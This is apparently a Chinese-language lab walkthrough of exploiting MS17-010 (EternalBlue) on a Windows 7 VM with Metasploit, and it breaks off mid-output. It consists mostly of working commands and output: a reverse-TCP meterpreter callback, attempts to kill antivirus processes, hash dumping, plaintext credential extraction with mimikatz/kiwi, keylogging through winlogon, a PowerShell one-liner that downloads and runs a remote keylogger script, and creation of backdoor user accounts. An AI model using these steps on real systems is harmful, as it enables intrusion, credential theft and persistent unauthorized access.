# 永恒之蓝ms17-010的利用 > 实验环境: > > Kali虚拟机:攻击机 > > Win7虚拟机:目标机 > > 主要工具:metasploit ##获取meterpreter 1. 使用关键字`17-010`在metasploit中查找 ``` msf5 > search 17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 1 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 2 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection 3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution ``` 2. 使用辅助模块auxiliary中的`auxiliary/scanner/smb/smb_ms17_010`验证是否存在漏洞 ``` msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.129 rhosts => 192.168.8.129 msf5 auxiliary(scanner/smb/smb_ms17_010) > run [+] 192.168.8.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [*] 192.168.8.129:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` 可以看到"Host is likely VULNERABLE to MS17-010!…",说明漏洞存在。 3. 利用漏洞反弹shell,获取meterpreter **360安全卫士会拦截**,目标机器不能装360或需关闭360。 ``` msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.129 rhosts => 192.168.8.129 msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.124 lhosts => 192.168.8.124 msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.8.124:4444 [*] 192.168.8.129:445 - Connecting to target for exploitation. [+] 192.168.8.129:445 - Connection established for exploitation. [+] 192.168.8.129:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.8.129:445 - CORE raw buffer dump (38 bytes) [*] 192.168.8.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] 192.168.8.129:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 192.168.8.129:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 192.168.8.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.8.129:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.8.129:445 - Sending all but last fragment of exploit packet [*] Sending stage (206403 bytes) to 192.168.8.129 [*] Meterpreter session 1 opened (192.168.8.124:4444 -> 192.168.8.129:49475) at 2019-10-12 03:50:01 -0400 [-] 192.168.8.129:445 - RubySMB::Error::CommunicationError: RubySMB::Error::CommunicationError meterpreter > ``` ##确认用户权限 ``` meterpreter > shell Process 2132 created. Channel 1 created. Microsoft Windows [�汾 6.1.7601] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ���� C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>exit exit meterpreter > ``` 可以看到是`system`权限。 也可以直接在meterpreter中运行`getuid`查看用户权限: ``` meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > ``` ##提权 如果不是system权限,可以尝试提权: ``` meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > ``` 看到"got system via technique..."字样,提权成功。 ##关闭杀毒软件 1. 自定义字典 在`/usr/share/metasploit-framework/data/wordlists/av_hips_executables.txt`中自定义字典,添加需要关闭的杀毒软件进程,如zhudongfangyu.exe、360tray.exe,全部小写。 2. 关闭杀毒软件 - killav **不要使用`run killav`** ``` meterpreter > run post/windows/manage/killav [*] Attempting to terminate 'ZhuDongFangYu.exe' (PID: 1064) ... [-] Failed to terminate 'ZhuDongFangYu.exe' (PID: 1064). [*] Attempting to terminate '360Tray.exe' (PID: 3408) ... [-] Failed to terminate '360Tray.exe' (PID: 3408). [+] A total of 2 process(es) were discovered, 0 were terminated. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > ``` 明明是system权限,进程竟然没有被杀掉,郁闷。 - powershell 通过shell命令进入到目标机器,然后执行powershell命令开启powershell交互界面,这个时候输入命令无响应,无法通过这种方式在目标机器执行powershell命令。所以采用下面这种方法。 ``` meterpreter > load load espia load kiwi load peinjector load sniffer load extapi load lanattacks load powershell load unhook load incognito load mimikatz load python load winpmem meterpreter > load powershell Loading extension powershell...Success. meterpreter > help powershell Powershell Commands =================== Command Description ------- ----------- powershell_execute Execute a Powershell command string powershell_import Import a PS1 script or .NET Assembly DLL powershell_shell Create an interactive Powershell prompt meterpreter > powershell_shell PS > Get-Process Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 173 20 13964 9544 117 0.23 1732 360leakfixer 584 55 99776 105588 317 8.49 3944 360Safe 1936 152 164724 20452 577 12.62 3408 360Tray 32 5 1088 3100 49 0.02 696 conhost 31 5 1084 3108 49 0.05 1448 conhost 515 12 2100 4360 83 0.50 364 csrss 574 15 10624 10204 178 2.64 468 csrss 195 16 4328 6932 57 0.56 1936 dllhost 126 14 51340 38100 130 1.05 2592 dwm 706 49 28940 46708 247 7.92 2632 explorer 64 7 1040 2832 35 0.03 1496 Ext2Srv 0 0 0 24 0 0 Idle 40 5 940 2392 21 0.00 1552 imdsksvc 772 24 4304 8300 45 2.09 572 lsass 204 10 2768 5024 33 0.11 580 lsm 50 8 996 2952 47 0.03 1584 metsvc 148 17 3476 4484 61 0.06 2192 msdtc 257 22 51456 55128 558 0.30 1608 powershell 271 22 51200 55432 559 0.22 3936 powershell 778 55 34844 16556 147 1.06 2076 SearchIndexer 228 14 5372 6572 44 2.15 556 services 405 31 9896 14852 163 0.94 3712 sesvc 30 2 452 776 4 0.12 276 smss 306 31 10076 13592 137 0.98 1856 SoftMgrLite 648 54 84828 76780 639 0.90 1284 spoolsv 508 17 5880 7316 44 1.26 548 svchost 361 14 4364 7272 46 2.40 688 svchost 268 16 3840 6712 38 0.34 792 svchost 472 23 17756 14100 84 3.07 860 svchost 427 24 66132 68028 162 13.32 940 svchost 1183 52 20824 24108 408 6.65 984 svchost 571 35 14256 12320 92 1.93 1144 svchost 143 15 2612 13328 51 0.34 1292 svchost 257 30 5788 7968 49 0.53 1332 svchost 94 8 1648 3592 47 0.02 1916 svchost 103 13 1872 5000 34 0.14 1992 svchost 314 41 61952 5296 129 0.73 2916 svchost 646 0 112 368 3 4 System 205 16 7412 8980 83 0.27 2504 taskhost 127 12 3640 13272 112 7.52 3440 taskmgr 280 23 11824 912 128 1.67 1016 updater 87 10 5224 3744 62 0.08 1632 VGAuthService 56 6 1436 2748 39 0.00 748 vmacthlp 310 25 10320 11500 100 5.88 1688 vmtoolsd 244 22 10488 15192 125 6.63 2788 vmtoolsd 82 10 1560 3988 57 0.09 456 wininit 118 10 2964 5708 66 0.25 520 winlogon 230 15 7052 10468 52 1208 WmiPrvSE 382 35 10520 10848 105 1.05 1064 ZhuDongFangYu PS > Stop-Process 1064 ERROR: Stop-Process : ??????????????ZhuDongFangYu (1064)?: ????? ERROR: ???? ?:1 ??: 13 ERROR: + Stop-Process <<<< 1064 ERROR: + CategoryInfo : CloseError: (System.Diagnost...(ZhuDongFangYu):Process) [Stop-Process], ProcessCommandEx EERROR: + FullyQualifiedErrorId : CouldNotStopProcess,Microsoft.PowerShell.Commands.StopProcessCommand ERROR: PS > ``` 现在meterpreter中加载powershell模块,然后执行`powershell_shell`命令进入交互式powershell界面。通过Get-Process查看到ZhuDongFangYu进程id为1064,然后通过Stop-Process停止进程,还是没有杀掉,持续郁闷。 ## 关闭防火墙 略 ##信息收集 ###获取目标主机详细信息 - run scraper 获取系统信息、环境变量、网络、服务、用户、域、密码哈希等信息。 ``` meterpreter > run scraper [*] New session on 192.168.8.129:445... [*] Gathering basic system information... [*] Dumping password hashes... [*] Obtaining the entire registry... [*] Exporting HKCU [*] Downloading HKCU (C:\Windows\TEMP\oksMbdKb.reg) [*] Cleaning HKCU [*] Exporting HKLM [*] Downloading HKLM (C:\Windows\TEMP\xZUHpvAU.reg) [*] Cleaning HKLM [*] Exporting HKCC [*] Downloading HKCC (C:\Windows\TEMP\pcrWzade.reg) [*] Cleaning HKCC [*] Exporting HKCR [*] Downloading HKCR (C:\Windows\TEMP\AXZDmEKp.reg) [*] Cleaning HKCR [*] Exporting HKU [*] Downloading HKU (C:\Windows\TEMP\jaOsLEOM.reg) [*] Cleaning HKU [*] Completed processing on 192.168.8.129:445... meterpreter > ``` - run winenum 部分结果和run scraper重复。 ``` meterpreter > run winenum [*] Running Windows Local Enumeration Meterpreter Script [*] New session on 192.168.1.8:445... [*] Saving general report to /root/.msf4/logs/scripts/winenum/PC_20191012.5354/PC_20191012.5354.txt [*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/PC_20191012.5354 [*] Checking if PC is a Virtual Machine ........ [*] This is a VMware Workstation/Fusion Virtual Machine [*] UAC is Disabled [*] Running Command List ... [*] running command arp -a [*] running command ipconfig /displaydns [*] running command ipconfig /all [*] running command route print [*] running command cmd.exe /c set [*] running command netstat -ns [*] running command netstat -nao [*] running command net accounts [*] running command netstat -vb [*] running command net view [*] running command net localgroup [*] running command net group administrators [*] running command net session [*] running command net share [*] running command net group [*] running command net user [*] running command net view /domain [*] running command netsh firewall show config [*] running command net localgroup administrators [*] running command tasklist /svc [*] running command netsh wlan show drivers [*] running command gpresult /SCOPE USER /Z [*] running command netsh wlan show networks mode=bssid [*] running command gpresult /SCOPE COMPUTER /Z [*] running command netsh wlan show profiles [*] running command netsh wlan show interfaces [*] Running WMIC Commands .... [*] running command wmic group list [*] running command wmic service list brief [*] running command wmic netlogin get name,lastlogon,badpasswordcount [*] running command wmic logicaldisk get description,filesystem,name,size [*] running command wmic useraccount list [*] running command wmic netuse get name,username,connectiontype,localname [*] running command wmic nteventlog get path,filename,writeable [*] running command wmic volume list brief [*] running command wmic share get name,path [*] running command wmic netclient list brief [*] running command wmic qfe [*] running command wmic startup list full [*] running command wmic rdtoggle list [*] running command wmic product get name,version [*] Extracting software list from registry [*] Dumping password hashes... [*] Hashes Dumped [*] Getting Tokens... [*] All tokens have been processed [*] Done! meterpreter > ``` ###查看目标主机安装了哪些应用 ``` meterpreter > run post/windows/gather/enum_applications [*] Enumerating applications installed on PC Installed Applications ====================== Name Version ---- ------- Advanced Archive Password Recovery 4.54.110.4540 Elcomsoft Forensic Disk Decryptor 1.00.110.1392 Ext2Fsd 0.69 0.69 Java 8 Update 121 (64-bit) 8.0.1210.13 Java Auto Updater 2.8.181.13 Java SE Development Kit 8 Update 121 (64-bit) 8.0.1210.13 Microsoft .NET Framework 4.7.2 4.7.03062 Microsoft .NET Framework 4.7.2 4.7.03062 Microsoft .NET Framework 4.7.2 (CHS) 4.7.03062 Microsoft .NET Framework 4.7.2 (简体中文) 4.7.03062 Microsoft Visual C++ 2005 Redistributable 8.0.61187 Microsoft Visual C++ 2005 Redistributable (x64) 8.0.61186 Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 9.0.30729.6161 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523 9.0.30729.7523 Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 10.0.40219 Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0 Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0 Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61135 11.0.61135 Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61135 11.0.61135 Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61135 11.0.61135 Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61135 11.0.61135 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 12.0.40664.0 Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 12.0.40664.0 Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 12.0.40664 Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 12.0.40664 Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 12.0.40664 Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 12.0.40664 Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 14.15.26706.0 Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 14.15.26706.0 Microsoft Visual C++ 2017 x64 Additional Runtime - 14.15.26706 14.15.26706 Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.15.26706 14.15.26706 Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 14.15.26706 Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 14.15.26706 Python 2.7.13 (64-bit) 2.7.13150 Python 3.7.3 Add to Path (64-bit) 3.7.3150.0 Python 3.7.3 Core Interpreter (64-bit) 3.7.3150.0 Python 3.7.3 Development Libraries (64-bit) 3.7.3150.0 Python 3.7.3 Documentation (64-bit) 3.7.3150.0 Python 3.7.3 Executables (64-bit) 3.7.3150.0 Python 3.7.3 Standard Library (64-bit) 3.7.3150.0 Python 3.7.3 Tcl/Tk Support (64-bit) 3.7.3150.0 Python 3.7.3 Test Suite (64-bit) 3.7.3150.0 Python 3.7.3 Utility Scripts (64-bit) 3.7.3150.0 Python 3.7.3 pip Bootstrap (64-bit) 3.7.3150.0 Python Launcher 3.7.6657.0 SecureCRT V6.2.3.313 汉化版 V6.2.3.313 汉化版 SilentEye 0.4.1 Stellar Phoenix JPEG Repair 5.0.0.0 Stellar Phoenix Photo Recovery Professional 8.0.0.1 Update for Microsoft .NET Framework 4.7.2 (KB4087364) 1 Update for Microsoft .NET Framework 4.7.2 (KB4457035) 1 VMware Tools 10.0.0.2977863 WinRAR 5.11 (64-位) 5.11.0 Windows Mobile Connectivity Tools 10.0.15254.0 - Desktop x86 10.1.15254.1 Windows SDK AddOn 10.1.0.0 搜狗输入法 9.1正式版 9.1.0.2657 [+] Results stored in: /root/.msf4/loot/20191012053311_default_192.168.8.129_host.application_804807.txt meterpreter > ``` ###查看目标主机有哪些用户 ``` meterpreter > run post/windows/gather/enum_logged_on_users [*] Running against session 1 Current Logged Users ==================== SID User --- ---- S-1-5-18 NT AUTHORITY\SYSTEM S-1-5-21-1244648496-323992457-611466280-1000 PC\XinSai [+] Results saved in: /root/.msf4/loot/20191012053946_default_192.168.8.129_host.users.activ_091950.txt Recently Logged Users ===================== SID Profile Path --- ------------ S-1-5-18 %systemroot%\system32\config\systemprofile S-1-5-19 C:\Windows\ServiceProfiles\LocalService S-1-5-20 C:\Windows\ServiceProfiles\NetworkService S-1-5-21-1244648496-323992457-611466280-1000 C:\Users\XinSai S-1-5-21-1244648496-323992457-611466280-501 C:\Users\Guest meterpreter > ``` ###抓取用户密码哈希 ``` meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: XinSai:1000:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634::: meterpreter > ``` 格式为`用户名:SID:LM哈希:NTLM哈希:::`,之后可以使用类似`John the Ripper`等工具进行破解哈希。 ###抓取用户密码明文 meterpreter内置了一些扩展库,可以通过输入load,然后连续按两次TAB键进行查看: ``` meterpreter > load load espia load kiwi load peinjector load sniffer load extapi load lanattacks load powershell load unhook load incognito load mimikatz load python load winpmem meterpreter > load ``` - kiwi模块 加载kiwi模块,然后运行`creds_all`命令。 ``` meterpreter > load kiwi Loading extension kiwi... .#####. mimikatz 2.1.1 20180925 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter > creds_all [+] Running as SYSTEM [*] Retrieving all credentials msv credentials =============== Username Domain LM NTLM SHA1 -------- ------ -- ---- ---- XinSai PC f0d412bd764ffe81aad3b435b51404ee 209c6174da490caeb422f3fa5a7ae634 7c87541fd3f3ef5016e12d411900c87a6046a8e8 wdigest credentials =================== Username Domain Password -------- ------ -------- (null) (null) (null) PC$ WORKGROUP (null) XinSai PC admin tspkg credentials ================= Username Domain Password -------- ------ -------- XinSai PC admin kerberos credentials ==================== Username Domain Password -------- ------ -------- (null) (null) (null) XinSai PC admin pc$ WORKGROUP (null) meterpreter > ``` 可以看到用户XinSai的密码为"admin"。 - mimikatz模块 加载mimikatz模块,然后运行wdigest: ``` meterpreter > help mimikatz Mimikatz Commands ================= Command Description ------- ----------- kerberos Attempt to retrieve kerberos creds. livessp Attempt to retrieve livessp creds. mimikatz_command Run a custom command. msv Attempt to retrieve msv creds (hashes). ssp Attempt to retrieve ssp creds. tspkg Attempt to retrieve tspkg creds. wdigest Attempt to retrieve wdigest creds. meterpreter > wdigest [+] Running as SYSTEM [*] Retrieving wdigest credentials wdigest credentials =================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;816638 NTLM PC xman666 mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO) 0;372325 NTLM PC XinSai mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO) 0;997 Negotiate NT AUTHORITY LOCAL SERVICE mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO) 0;996 Negotiate WORKGROUP PC$ mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO) 0;48926 NTLM mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO) 0;999 NTLM WORKGROUP PC$ mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO) meterpreter > ``` 然而并没有得到密码,翻车。 ###流量嗅探 ####键盘记录 - keyscan_dump Meterpreter还可以在目标设备上实现键盘记录功能,键盘记录主要涉及以下三种命令: > keyscan_start:开启键盘记录功能 > > keyscan_dump:显示捕捉到的键盘记录信息 > > keyscan_stop:停止键盘记录功能 不过在使用键盘记录功能时,通常需要跟目标进程进行绑定。下面我们会将Meterpreter跟 winlogon.exe 绑定,并在登录进程中捕获键盘记录,以获得用户的密码。 1. 绑定进程 ``` meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 240 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 328 320 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 340 908 dwm.exe x64 3 C:\Windows\system32\Dwm.exe 384 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 412 320 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe 524 412 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe 540 412 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe 548 412 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe 616 524 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 648 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM 712 524 vmacthlp.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe 744 524 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 816 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 908 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM 960 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1032 1176 QwdqufeOMpX.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\QwdqufeOMpX.exe 1088 4060 LogonUI.exe x64 4 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe 1112 1176 sQoycPhez.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\sQoycPhez.exe 1176 524 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 1212 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1268 524 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE 1320 524 Ext2Srv.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Ext2Fsd\Ext2Srv.exe 1364 524 imdsksvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\imdsksvc.exe 1412 524 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe 1456 524 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 1584 524 taskhost.exe x64 3 C:\Windows\system32\taskhost.exe 1732 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1796 524 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 1956 524 dllhost.exe x64 0 NT AUTHORITY\SYSTEM 1996 648 WmiPrvSE.exe 2284 1088 csrss.exe x64 3 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 2408 2732 SearchFilterHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchFilterHost.exe 2496 2272 explorer.exe x64 3 C:\Windows\Explorer.EXE 2596 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2668 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2732 524 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM 2828 1176 xmutGkHXf.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\xmutGkHXf.exe 2840 1176 TeyQCXoY.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\TeyQCXoY.exe 3020 1176 plKeHIXhzUQQ.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\plKeHIXhzUQQ.exe 3220 1176 maBudFEovnC.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\maBudFEovnC.exe 3384 1176 wLBliAR.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\wLBliAR.exe 3456 2912 csrss.exe x64 4 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 3748 816 audiodg.exe x64 0 3784 2732 SearchProtocolHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchProtocolHost.exe 3944 2496 vmtoolsd.exe x64 3 C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 4024 1176 dtUmbNlfMa.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\dtUmbNlfMa.exe 4060 2912 winlogon.exe x64 4 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe meterpreter > getpid Current pid: 1176 meterpreter > ``` 可以看到winlogon.exe的pid为4060,且当前meterpreter的pid为1176。下面进行进程绑定。 ``` meterpreter > migrate 4060 [*] Migrating from 1176 to 4060... [*] Migration completed successfully. meterpreter > getpid Current pid: 4060 meterpreter > ``` 绑定成功,且meterpreter的pid已迁移到目标进程。 2. 键盘监听 ``` meterpreter > keyscan_start Starting the keystroke sniffer ... meterpreter > ``` 此时在受害者机密登录界面,输入密码进行登录。然后: ``` meterpreter > keyscan_dump Dumping captured keystrokes... admin meterpreter > keyscan_stop Stopping the keystroke sniffer... meterpreter > ``` 成功捕获了受害者的输入"admin",密码即"admin",最后是回车。 - keylogrecorder ``` meterpreter > run keylogrecorder -h [!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder. [!] Example: run post/windows/capture/keylog_recorder OPTION=value [...] Keylogger Recorder Meterpreter Script This script will start the Meterpreter Keylogger and save all keys in a log file for later anlysis. To stop capture hit Ctrl-C Usage: OPTIONS: -c Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration. Default is 2. -h Help menu. -k Kill old Process -l Lock screen when capturing Winlogon credentials. -t Time interval in seconds between recollection of keystrokes, default 30 seconds. meterpreter > run keylogrecorder -c 0 [!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder. [!] Example: run post/windows/capture/keylog_recorder OPTION=value [...] [*] explorer.exe Process found, migrating into 2764 [*] Migration Successful!! [*] explorer.exe Process found, migrating into 928 meterpreter > run keylogrecorder -c 0 [!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder. [!] Example: run post/windows/capture/keylog_recorder OPTION=value [...] meterpreter > ``` 结果并没有捕获到键盘输入,翻车。 - Get-Keystrokes 下载powershell脚本:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1,上传到目标主机,然后执行: ``` PS D:\> Import-Module .\Get-Keystrokes.ps1 PS D:\> Get-Keystrokes -LogPath c:\windows\temp\key.log PS D:\> ``` 所有的按键都会被记录到key.log中。 也可以执行如下命令: ``` PS D:\> iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-Keystrokes.ps1’); Get-Keystrokes –Logpath c:\windows\temp\key.log ``` ##添加新用户 - run getgui ``` meterpreter > run getgui -u xman666 -p admin [!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp. [!] Example: run post/windows/manage/enable_rdp OPTION=value [...] [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Setting user account for logon [*] Adding User: xman666 with Password: admin [-] Account could not be created [-] Error: [-] 命令成功完成。 [*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.2058.rc meterpreter > shell Process 4020 created. Channel 54 created. Microsoft Windows [版本 6.1.7601] 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。 C:\Windows\system32>net user xman666 net user xman666 用户名 xman666 全名 注释 用户的注释 国家/地区代码 000 (系统默认值) 帐户启用 Yes 帐户到期 从不 上次设置密码 2019/10/13 11:20:58 密码到期 2019/11/24 11:20:58 密码可更改 2019/10/13 11:20:58 需要密码 Yes 用户可以更改密码 Yes 允许的工作站 All 登录脚本 用户配置文件 主目录 上次登录 从不 可允许的登录小时数 All 本地组成员 *Users 全局组成员 *None 命令成功完成。 C:\Windows\system32> ``` 可以看到,这里用户创建成功了,但添加到Administrators组失败了。 - 命令行 ``` meterpreter > shell Process 2816 created. Channel 52 created. Microsoft Windows [版本 6.1.7601] 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。 C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>net user net user \\ 的用户帐户 ------------------------------------------------------------------------------- Administrator Guest XinSai xman666 命令运行完毕,但发生一个或多个错误。 C:\Windows\system32>net user test test /add net user test test /add 命令成功完成。 C:\Windows\system32>net user net user \\ 的用户帐户 ------------------------------------------------------------------------------- Administrator Guest test XinSai xman666 命令运行完毕,但发生一个或多个错误。 ``` 可以看到添加了一个用户test,密码为test。查看用户信息: ``` C:\Windows\system32>net user test net user test 用户名 test 全名 注释 用户的注释 国家/地区代码 000 (系统默认值) 帐户启用 Yes 帐户到期 从不 上次设置密码 2019/10/13 11:11:32 密码到期 2019/11/24 11:11:32 密码可更改 2019/10/13 